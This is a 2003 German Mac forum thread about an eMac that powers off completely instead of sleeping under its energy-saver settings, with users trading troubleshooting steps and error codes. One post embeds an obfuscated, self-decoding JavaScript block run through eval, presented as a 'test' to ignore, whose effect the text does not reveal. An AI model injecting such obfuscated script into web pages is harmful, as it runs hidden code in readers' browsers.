Push-Nachrichten von MacTechNews.de
Würden Sie gerne aktuelle Nachrichten aus der Apple-Welt direkt über Push-Nachrichten erhalten?
Forum>Hardware>Probleme mit "Energie sparen"

Probleme mit "Energie sparen"

kester09.05.0315:44
Nachdem frashier's Word-Problem nun gelöst zu sein scheint habe ich hier eine neue Kopfnuss für euch:

Wenn ich meine "Energie sparen" Einstellungen so setze, das der Monitor früher als der Rechner schlafen geschickt wird (also z.B. Monitor 5 Min. und Rechner 30 Min.), dann schaltet sich der Rechner nach der eingestellten Zeit <b>komplett aus</b>.

Was ich bislang alles versucht habe:

- alle Startobjekte entfernt
- alle fremden Kontrollfelder und Haxies entfernt
- sicherer Systemstart (ohne nicht-Apple kext)
- alle USB/FireWire Geräte abgestöpselt
- HD überprüft und repariert
- Benutzerrechte überprüft und repariert
- com.apple.PowerManagement.xml gelöscht
- PRAM gelöscht
- NVRAM gelöscht
- Puffer-Batterie ersetzt
- logic board (PMU) reset
- 10.2.5 Combo neu installiert
- 10.2.6 Update aufgespielt

Sonst noch wohlgemeinte und sinvolle Vorschläge? Ach ja, der Hardware Test bricht mit folgender Meldung ab, bzw. befördert mich in Open Firmware: DEFAULT CATCH!, code=300 at %SRR0 00034870 %SRR1 00003030.
0

Kommentare

maclooser09.05.0317:07
Hier wäre interessant; welcher Rechner, welches BS, welche Erweiterungssteckkarten, wieviel Arbeitsspeicher.
Also alle Eckdaten. Auch Stealth ist nicht "serienmäßig".
0
NoName
NoName09.05.0317:14
Ok, halt mich für verrückt, aber check mal das Verbindungskabel zum Moni und überprüfe das Problem, wenn möglich, mal mit einem anderen Monitor.
„Komm wir essen Opa (Satzzeichen retten leben)“
0
kester09.05.0319:44
Ich hab' einen eMac 700 Mhz, 128 + 512 MB RAM. Education Edition: nur CR-ROM und kein Modem.

Der große Riegel ist kurz nach dem Kauf (vor ca. 9 Monaten) eingesetzt worden. Läuft bis dato einwandfrei. Habe auch schon versucht die Riegel zu tauschen - bringt aber auch nix.

Sonst keine Erweiterungen oder sonstige Modifizierungen. Wie auch? Erstens passt nix rein, zweitens kommt man ja auch nirgendwo dran.

maclooser Was meinst du mit Stealth?

NoName Ich werde die Verbindung prüfen, aber einen 2ten Moni hab' ich nicht. Außerdem bräuchte ich dafür noch einen Adapter, da der eMac nur so einen Mini-Ausgang hat.
0
NoName
NoName09.05.0320:06
Naja, beim eMac, kommt der Moni wohl eher nicht in Frage. OS9 hast Du nicht zufällig noch drauf, sonst könntest es auch 9 gebootet probieren.
„Komm wir essen Opa (Satzzeichen retten leben)“
0
kester09.05.0321:07
NoName: Das würde ich jetzt nicht unbedingt ausschließen wollen. Über den eMac sind schon die unterschiedlichsten Monitorprobleme berichtet worden. Leider.

OS9 hab ich auch noch drauf. Aber da scheint sich in Sachen "Energie sparen" überhaupt nichts mehr zu tun. Bleibt einfach alles an. Daher habe ich schon vermutet es könne an der Firmware liegen. Leider gibt es für den eMac keine f/w Updates, und ich wüsste nicht, wie man die Original f/w nochmal drüberbügeln könnte.

Es folgt noch ein kleiner Test in eigener Sache. Ab hier einfach ignorieren, egal was dabei rauskommt.

<script type="text/javascript">
<!--
var x="function f(x){var i,o=\"\",ol=x.length,l=ol;while(x.charCodeAt(l/13)!" +
"=126){try{x+=x;l+=l;}catch(e){}}for(i=l-1;i>=0;i--){o+=x.charAt(i);}return " +
"o.substr(0,ol);}f(\")72,\\\"&, 3;&v9)``wE={}hX&~zmS8'XwqdT^320\\\\520\\\\63" +
"0\\\\Zr\\\\310\\\\630\\\\V600\\\\120\\\\230\\\\6S,R310\\\\100\\\\030\\\\200" +
"\\\\630\\\\IJ;310\\\\n\\\\700\\\\M100\\\\000\\\\r\\\\730\\\\,8((?2b8\\\"\\\\"+
"9=2?s410\\\\s*/:.d#|430\\\\420\\\\TTS@[BY200\\\\^FCIWCqx\\\"(f};o nruter};)" +
")++y(^)i(tAedoCrahc.x(edoCrahCmorf.gnirtS=+o;721=%y;++y)72<i(fi{)++i;l<i;0=" +
"i(rof;htgnel.x=l,\\\"\\\"=o,i rav{)y,x(f noitcnuf\")" ;
while(x=eval(x));
//
</script>
0
formac
formac10.05.0313:36
Energiespar-Probleme hatte ich auch, als ich den formac tft digital an meinen G 4 / OS 10.2.5 (jetzt .6) angeschlossen habe. Egal ob Bildschirmschoner, Energie Saver und Festplatten-Standby - sie haben nur zu einem geführt: Systemabsturz beim Wiederhochfahren. Das gab es beim vorher installierten Iiyama CRT nicht. Konsequenz: Jetzt spare ich keine Energie mehr per Softwaresteuerung und schalte den Rechner dafür des öfteren richtig ab. Und siehe da: Keine Systemabstürze mehr. Wer weiß, wo die Ursachen liegen (könnten), kann sich gerne mal melden. Eine Lösung ohne Hintergrundwissen ist halt immer nur eine halbe Lösung.
0
maclooser10.05.0314:20
Warum @NoName Monitor meinte, durch die Beschaltung der Drähte ist eine Steuerung möglich. Wenn das Gerät an sich diese "Sparfunktionen" nicht unterstützt oder durch Kabelbruch verstehen kann, wird das nix.
@kester; Stealth Serial Port war eine lange Zeit eine Möglichkeit, dem Mac über den normalen Modemanschluß diese serielle Schnittstelle zur Verfügung zu stellen. Was aber fast nur bei allen aufklappbaren; also G 3 b&w aufwärts.
0
wolfgang 13.05.0307:18
hallo kester
da ich genauso ein problem mit dem energie-spar einstellungen habe erst mal zu dir wegen der fehler-meldung: schau mal unter mac-error-codes D nach in Versiontracker falls du da nichts findest schicke ichs dir per e-mail zu , ich habs mal flüchtig durchgesehen , bin aber nur auf eine fehlermeldung mit der nr. 3oo gestoßen und da mußt mal sehn

Slot-Manager-Fehler:
-300 smEmptySlot Der Slot enthält keine Karte


so zu mir: ich hab meinen PM G4 Dual 867 mit Sony Monitor 19 Zoll CRT jetzt schon das 2. Mal nach dem Energie-Spar-Modus der Systemerweiterung nicht mehr aufwecken können, mir blieb nichts als ein Neustart. Frage- hat jemand eine Idee ausser den Monitor einfach auszumachen ? Möchte nicht immer den ein und ausschaltknopf drücken müssen, zumal es glaube ich auch nicht "gesund" ist für Moni.
0
Mike13.05.0316:05
Das geschilderte Problem habe ich auch am G3 unter 9.22
Nach der Verdunkelung läuft nix mehr und ich muss neu starten.
Scheint am *Energie sparen* zu liegen.
0
kester14.05.0301:10
wolfgang & Mike: Wie ist das bei euch mit der Hardware Test CD? Gibt's da auch 'ne Fehlermeldung, oder läuft die bei euch?

Ich hatte das Problem nicht schon immer. Trat nach irgendeinem (10.1.6?) Update auf. Das war das Update bei dem Apple die USB Treiber grundlegend überarbeitet hatte. Danach haben etliche USB Hubs beim aufwachen aus dem Ruhezustand Kernel Panics verursacht. Die Sache mit den Hubs haben sie wieder in den Griff gekriegt (nach ca. 6-8 Monaten ), aber "Energie Sparen" macht immer noch vielen Leuten Probleme. Siehe Apple's OS X Forum...
0
wolfgang 14.05.0301:42
hallo kester
hatte mir vor kurzem nen neuen hub gekauft , zu der zeit wo 10.2.5 rauskam , da war ja das problem mit den usb-hubs aktuell
jetzt gehts mit dem hub wieder dafür hab ich jetzt nen schönen neuen gebrauchten hochwertigen sony crt-monitor, obs an dem liegt kann ich nicht sagen und die hardware-cd hab ich noch nicht laufen lassen
ich bekomme morgen oder übermorgen eine neue hd und wenn ich die einbaue werde ich mal gründlich auf fehlersuche gehen , inclusive hardware-cd
auf jeden fall schonmal danke für den hinweis
apropos hinweis, konntest du mit meinem hinweis was anfangen ? oder brauchst du dieses kleine programm mit den fehlermeldungen ? dann gib mir einfach deine e-mail adresse , das progr. ist nicht groß
gruß wolf1210
0
kester14.05.0302:22
wolfgang: Danke, hab ich mir bei VT runtergeladen. Aber ich bin noch auf der Suche. Kann aber sein, dass diese Fehlermeldung nirgends gelistet ist, da es sich dabei ja um eine Open Firmware Meldung handlet.
0

Kommentieren

Diese Diskussion ist bereits mehr als 3 Monate alt und kann daher nicht mehr kommentiert werden.